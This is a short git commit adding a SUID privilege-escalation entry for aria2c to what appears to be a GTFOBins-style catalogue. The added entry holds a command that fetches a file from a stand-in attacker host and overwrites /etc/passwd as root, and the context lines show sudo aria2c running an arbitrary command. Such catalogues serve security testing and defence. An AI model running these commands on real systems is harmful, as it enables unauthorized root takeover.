Add SUID method to aria2c

Found this new method of abusing aria2c's suid for privilege escalation.
This commit is contained in:
ohyicong 2023-01-02 16:36:59 +08:00
parent f4e71b63cb
commit 42cac0885e

View File

@ -17,6 +17,10 @@ functions:
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
sudo aria2c --on-download-error=$TF http://x sudo aria2c --on-download-error=$TF http://x
suid:
- code: |
aria2c -d /etc/ -o passwd "http://attacker.com/passwd" --allow-overwrite=true
- description: Remote download and replace /etc/passwd with root privilege.
limited-suid: limited-suid:
- code: | - code: |
COMMAND='id' COMMAND='id'